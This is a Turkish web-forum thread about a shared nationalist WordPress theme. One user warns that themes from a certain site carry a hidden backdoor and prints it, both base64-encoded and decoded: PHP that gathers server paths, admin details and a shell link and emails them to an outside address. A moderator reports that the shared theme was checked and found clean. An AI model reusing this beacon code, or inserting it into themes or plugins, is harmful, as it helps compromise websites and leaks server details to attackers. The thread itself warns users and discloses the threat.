freelance iş ilanları

Wordpress Ülkücü Teması

23 Mesajlar 7.882 Okunma
lstbozum
smsonayhizmeti

Kozan Kozan Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 10.10.2011
  • Yaş/Cinsiyet - / E
  • Meslek
  • Mesajlar 24
  • Beğeniler 0 / 1
  • Ticaret 0, (%0)
Merhaba Arkdaslar: bir cok forum sitelerin'de gordugum kadari ile sitem eden bazi arkadaslar var.. neden; haber, magazin, müzik vs vs temalari varda milliyetci temasi yok yapilmiyor diye.. ben'de kullanicilara karsi bi tema editledim.. onu yayinlamak istiyorum..

Tema Sahibi: WpTr.Net

Edit By: AskSiteleri.Net

-------------------------------------------------------

Demo: Ülkücü Temaları

Indir: Milliyetci Tema

wmaraci
reklam

SysteM SysteM Sms Onayı Gerekli Banlı Kullanıcı
  • Üyelik 29.07.2011
  • Yaş/Cinsiyet 33 / E
  • Meslek Öğrenci
  • Konum İstanbul Avrupa
  • Ad Soyad ** **
  • Mesajlar 161
  • Beğeniler 1 / 17
  • Ticaret 0, (%0)
wptr.net teması resimleri değiştirilmiş gibi geldi bana.Paylaşım için teşekkürler...

future future Computer Engineer Kullanıcı
  • Üyelik 27.06.2011
  • Yaş/Cinsiyet 35 / E
  • Meslek Computer Engineer
  • Konum Adana
  • Ad Soyad Y** Y**
  • Mesajlar 1165
  • Beğeniler 92 / 153
  • Ticaret 62, (%100)
Wptr.net isimli sitede wordpress temalarına base encode ile shell ekliyorlar ve bu şekilde dağıtım yapıyorlar. Tema klasörlerinin içerisinde header.php harici, birde headers.php adıyla bir dosya daha eklenmiş ve temel dosyalara ilişkilendirilip şifrelenmiş.

Casus dosyaların içinde şifrelenmiş şekilde şu satırlar var.
JGtpbWU9ImluZGlyZWxpbWhlbWVuQGdtYWlsLmNvbSI7DQokYmFzbGlrPSJXb3JkUHJlc1MgVGVtYSBTdyBBdmNpc2kgVjMuMCI7DQokRUxfTXVIYU1NZUQ9IkRvc3lhIFlvbHUgOiAiLiRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNlcnZlciBBZG1pbiA6ICIuJF9TRVJWRVJbJ1NFUlZFUl9BRE1JTiddLiJybiI7DQokRUxfTXVIYU1NZUQuPSJTZXJ2ZXIgaXNsZXRpbSBzaXN0ZW1pIDogIi4kX1NFUlZFUlsnU0VSVkVSX1NPRlRXQVJFJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNoZWxsIExpbmsgOiBodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUEhQX1NFTEYnXS4icm4iOw0KJEVMX011SGFNTWVELj0iQXZsYW5hbiBTaXRlIDogIiAuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiJybiI7DQptYWlsKCRraW1lLCAkYmFzbGlrLCAkRUxfTXVIYU1NZUQpOw=="));?>

Şifresiz hali budur.
z��r�^$kime="indirelimhemen@gmail.com";
$baslik="WordPresS Tema Sw Avcisi V3.0";
$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn";
$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn";
$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn";
$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn";
$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn";
mail($kime, $baslik, $EL_MuHaMMeD);

ÖNEMLİ NOT: Temaları dağıtımını yapan sitelerden değilde kim tasarladıysa onun resmi sitesinden indirmeye dikkat edin.

Buda yetmezmiş gibi Shell eklemişler scriptlere Siteleri hacklemek için .. headers.php içine shell kodlarını eklemişler admin
ve db nizi hacklemek adına .. Siz Siz Olun Dikkatli Olun Bunu Açıklayanı pek görmedim Beni Çok Hacklemişlerdi Sizin Başınıza
gelmesin dileklerimle ..

Alıntıdır.

• Üyelik 10.10.2011
  • Yaş/Cinsiyet - / E
  • Meslek
  • Mesajlar 24
  • Beğeniler 0 / 1
  • Ticaret 0, (%0)

SysteM adlı üyeden alıntı

wptr.net teması resimleri değiştirilmiş gibi geldi bana.Paylaşım için teşekkürler...

Zaten tema sahibini belirttim dikkatli okursaniz.. ben sadece editledim.

wmaraci
wmaraci

Yepuu Yepuu Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 07.11.2011
  • Yaş/Cinsiyet - / E
  • Meslek
  • Mesajlar 2
  • Beğeniler 0 / 0
  • Ticaret 0, (%0)
Beğenmedim.

• Üyelik 10.10.2011
  • Yaş/Cinsiyet - / E
  • Meslek
  • Mesajlar 24
  • Beğeniler 0 / 1
  • Ticaret 0, (%0)

future adlı üyeden alıntı

Wptr.net isimli sitede wordpress temalarına base encode ile shell ekliyorlar ve bu şekilde dağıtım yapıyorlar. Tema klasörlerinin içerisinde header.php harici, birde headers.php adıyla bir dosya daha eklenmiş ve temel dosyalara ilişkilendirilip şifrelenmiş.

Casus dosyaların içinde şifrelenmiş şekilde şu satırlar var.

Şifresiz hali budur.

ÖNEMLİ NOT: Temaları dağıtımını yapan sitelerden değilde kim tasarladıysa onun resmi sitesinden indirmeye dikkat edin.

Buda yetmezmiş gibi Shell eklemişler scriptlere Siteleri hacklemek için .. headers.php içine shell kodlarını eklemişler admin
ve db nizi hacklemek adına .. Siz Siz Olun Dikkatli Olun Bunu Açıklayanı pek görmedim Beni Çok Hacklemişlerdi Sizin Başınıza
gelmesin dileklerimle ..

Alıntıdır.

Merhabalar dosyayi indirip bakildiginda hic birsekilde illegal sifreler icerikler yoktur.. ama yapimcinin diger temalarini bilemem..

Pasa Pasa Gelecek Bizim Yönetici
  • Üyelik 30.03.2011
  • Yaş/Cinsiyet 33 / E
  • Meslek Bilgisayar Mühendisi
  • Konum 🖤 Hatay
  • Ad Soyad S** P**
  • Mesajlar 14611
  • Beğeniler 3060 / 3059
  • Ticaret 356, (%100)
Konuyu incelenmek üzere silmiştim. Temayı Ömer arkadaşımız inceledi ve bu temada bir shell'e vs rastlamadı.

Yinede bu temayı inceleyip bir shell var olduğunu iddaa eden olursa direk yöneticilerle irtibata geçip durumu ayrıntılı olarak bildirebilir.

Önceki mesajlarda verilen tepkinin sebebi zannediyorum wptr.net ile ilgili öncesinden şöyle bir konunun açılmasıydı: http://wmaraci.com/forum/wp-tema-arsivi/wptr-net-temalarini-kullanmayin-siteniz-hacklenir-4724.html

Deneyim demeyin, deneyin!

Mert Mert Bornova Kullanıcı
  • Üyelik 28.11.2010
  • Yaş/Cinsiyet 31 / E
  • Meslek Esnaf
  • Konum İzmir
  • Ad Soyad M** A**
  • Mesajlar 207
  • Beğeniler 25 / 25
  • Ticaret 8, (%100)

Nonloser adlı üyeden alıntı

Konuyu incelenmek üzere silmiştim. Temayı Ömer arkadaşımız inceledi ve bu temada bir shell'e vs rastlamadı.

Yinede bu temayı inceleyip bir shell var olduğunu iddaa eden olursa direk yöneticilerle irtibata geçip durumu ayrıntılı olarak bildirebilir.

Önceki mesajlarda verilen tepkinin sebebi zannediyorum wptr.net ile ilgili öncesinden şöyle bir konunun açılmasıydı: http://wmaraci.com/forum/wp-tema-arsivi/wptr-net-temalarini-kullanmayin-siteniz-hacklenir-4724.html

İnsanın güvenini bir kere yitirdiler bence forumda böyle kötü niyetlilerin paylaşımını bile yapmıyalım.

Bariswp Bariswp ZM Kullanıcı
  • Üyelik 27.03.2011
  • Yaş/Cinsiyet 34 / E
  • Meslek ZM
  • Konum Adana
  • Ad Soyad A** D**
  • Mesajlar 2267
  • Beğeniler 316 / 445
  • Ticaret 15, (%100)
shell mell bilmem ama tema berbat

Olric Olric WM Aracı Kullanıcı
  • Üyelik 10.01.2011
  • Yaş/Cinsiyet 30 / E
  • Meslek Reklam
  • Konum Samsun
  • Ad Soyad O** Ç**
  • Mesajlar 1178
  • Beğeniler 0 / 247
  • Ticaret 42, (%100)
Bu arada '' Kominizm '' değil, Komünizm.

wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al